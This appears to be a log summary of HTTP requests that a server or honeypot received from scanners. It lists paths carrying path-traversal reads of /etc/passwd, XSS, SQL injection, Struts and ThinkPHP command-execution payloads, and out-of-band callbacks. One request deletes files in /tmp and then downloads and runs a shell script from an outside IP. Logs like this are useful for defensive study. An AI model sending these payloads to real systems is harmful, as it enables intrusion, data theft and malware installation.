1	GET	`/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd`	HTTP/1.1
2	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/components/com_ionfiles/download.php?download=1&file=../../../../../../../../etc/passwd`	HTTP/1.1
7	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/debug.cgi`	HTTP/1.1
1	GET	`/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
1	GET	`/error.log`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd`	HTTP/1.1
1	GET	`/icons/.%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd`	HTTP/1.1
1	GET	`/index.php/component/chronoforums2/profiles/avatar/u1?av=../../../../../../../etc/passwd&tvout=file`	HTTP/1.1
1	GET	`/index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_awdwall`	HTTP/1.1
1	GET	`/index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_blogfactory`	HTTP/1.1
1	GET	`/index.php?controller=../../../../../../../../../etc/passwd%00&option=com_graphics`	HTTP/1.1
1	GET	`/index.php?fileid=../../../../../../../../../../etc/passwd%00&option=com_simpledownload&task=download`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/login/`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/owa/auth/x.js`	HTTP/1.1
1	GET	`/pages/includes/status-list-mo%253Ciframe%2520src%253D%2522javascript%253Aalert%2528document.domain%2529%2522%253E.vm`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/search.php?search=%22wget+http%3A%2F%2Fcflfdd6upkq5pdg00010opqkzazceayr5[.]oast[.]live%27%22`	HTTP/1.1
1	GET	`/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http[:]//cflfdd6upkq5pdg00010qmyrhskq4ws7z[.]oast[.]live`	HTTP/1.1
1	GET	`/services/getFile.cmd?userfile=config.xml`	HTTP/1.1
3	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 100.43.163.61/jaws;sh+/tmp/jaws`
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/test.cgi`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/visualrf/group_list.xml?aps=1&end=500&match&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g`	HTTP/1.1
1	GET	`/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd`	HTTP/1.1
1	GET	`/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd`	HTTP/1.1
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/_async/AsyncResponseService`	HTTP/1.1
1	POST	`/apply_sec.cgi`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh`	HTTP/1.1
1	POST	`/cgi-bin/.%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/bin/sh`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/getcfg.php`	HTTP/1.1
1	POST	`/public/index.php/home/index/bind_follow/?is_ajax=1&publicid=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--++`	HTTP/1.1
2	POST	`/scgi-bin/platform.cgi`	HTTP/1.1
1	POST	`/var`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/viewlog.jsp`	HTTP/1.1
1	POST	`/wls-wsat/CoordinatorPortType`	HTTP/1.1
2	PRI	`*`	HTTP/2.0